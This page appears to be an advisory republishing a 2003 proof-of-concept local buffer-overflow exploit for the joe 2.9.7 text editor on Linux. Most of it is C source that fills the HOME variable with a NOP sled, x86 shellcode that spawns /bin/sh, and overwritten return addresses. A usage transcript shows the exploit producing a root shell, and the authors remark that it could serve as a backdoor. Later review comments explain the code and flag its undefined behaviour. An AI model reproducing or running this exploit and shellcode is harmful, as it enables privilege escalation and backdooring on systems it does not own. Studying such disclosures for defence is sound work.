There is a buffer overflow vulnerability in the popular UNIX/Linux terminal text editor "joe". As far as is known, version 2.9.7 is affected. The following is a proof-of-concept local exploit, tested on Slackware [kernel 2.4.20] only.
Credit:
The information has been provided by dodo and tsunami.
Exploit:
/*
Linux x86 "joe" local exploit
author: dodo <dodo@darkwired.org>
author: tsunami <tsunami@darkwired.org>
tested on: Slackware Linux (2.4.20), `joe` 'version 2.9.7'
date: 30-07-2003 updated: 01-08-03
notes:
could be used for backdooring purposes..
greets to everyone @ #darkwired
root@comprak:/dodo/edu/joe# chmod a+s /usr/bin/joe
dodo@comprak:/dodo/edu/joe$ ./dw-bof-joe -2000
sh-2.05b# id
uid=0(root) gid=10(wheel) groups=10(wheel)
usage:
./dw-bof-joe [offset]
Slackware Linux offset: -2000
contact:
http://www.darkwired.org/
ssl-irc: irc.darkwired.org #darkwired
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* Size in bytes of the overlong value the PoC builds; the trailing 32
 * bytes of the local buffer in main() are filled separately. */
#define BSIZE 1016
/* Raw x86 machine code used as the payload. It is treated as an opaque
 * NUL-terminated string: its length is taken with strlen() at the copy
 * site in main(), so the byte sequence itself is never interpreted by
 * this program. Only meaningful on 32-bit x86 Linux (see get_sp()). */
static char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x17\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x31\xd2\xcd"
"\x80\xe8\xe4\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x58";
/* Returns an approximation of the caller's stack pointer.
 *
 * The function has no return statement: it relies on the inline asm
 * leaving %esp in %eax and on the i386 ABI returning integers in %eax.
 * That is undefined behaviour in standard C, only works on 32-bit x86,
 * and is sensitive to compiler and optimisation level. The result is
 * also only useful on systems without stack randomisation, which is why
 * this class of PoC fails on modern ASLR-enabled kernels. */
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
/* Entry point. Builds an overlong string in `buffer`, exports it as the
 * HOME environment variable and then runs `joe` via system().
 *
 * argv[1] (optional) is an integer offset, parsed with atoi() and so
 * unchecked; it defaults to -2000 and is subtracted from the sampled
 * stack pointer. Returns -1 if setenv() fails, otherwise 1 after `joe`
 * exits.
 *
 * NOTE(review): memset/memcpy/strlen are used without <string.h>, so
 * this relies on implicit declarations (a hard error on modern C
 * compilers). The vulnerable code in joe is not on this page; the
 * assumption is that joe copies HOME into a fixed-size buffer — verify
 * against the joe 2.9.7 sources. The observed impact (root shell in the
 * header transcript) exists only because the binary was made setuid
 * with `chmod a+s`, which the editor does not require. */
int main(int argc, char *argv[])
{
/* Payload area plus 32 bytes for the trailing pointer values. */
char buffer[BSIZE+32];
unsigned long sp = get_sp(), i;
signed long offset = -2000;
/* atoi() gives no error indication; non-numeric input silently becomes 0. */
if(argc>1) offset = atoi(argv[1]);
sp = sp - offset;
/* Fill the whole buffer with 0x90 (x86 NOP); "glijbaan" is Dutch for "slide". */
memset(buffer, 0x90, sizeof(buffer)); //NOP slide
/* Place the payload so it ends exactly at byte BSIZE. */
memcpy(buffer+(BSIZE-strlen(shellcode)), (char *)&shellcode, strlen(shellcode));
//memcpy(buffer+BSIZE+12, &sp, sizeof(sp));
/* Write the adjusted stack pointer into the last 32 bytes, 4 bytes at a
 * time. The cast to long* through a char array assumes 32-bit long and
 * tolerates unaligned access; it is not portable. */
for(i=BSIZE;i<BSIZE+32;i+=4)
{
*(long *)&buffer[i] = sp;
}
/* NOTE(review): buffer has BSIZE+32 elements, so index BSIZE+32 is one
 * past the end — this terminator write is out of bounds (UB). */
memset(buffer+BSIZE+32, 0x0, 1);
/* The overlong value is delivered through the HOME environment variable,
 * which the child process inherits. */
if(setenv("HOME", buffer, 1)==-1) return -1;
/* system() runs `joe` through /bin/sh -c with the modified environment. */
system("joe");
return 1;
}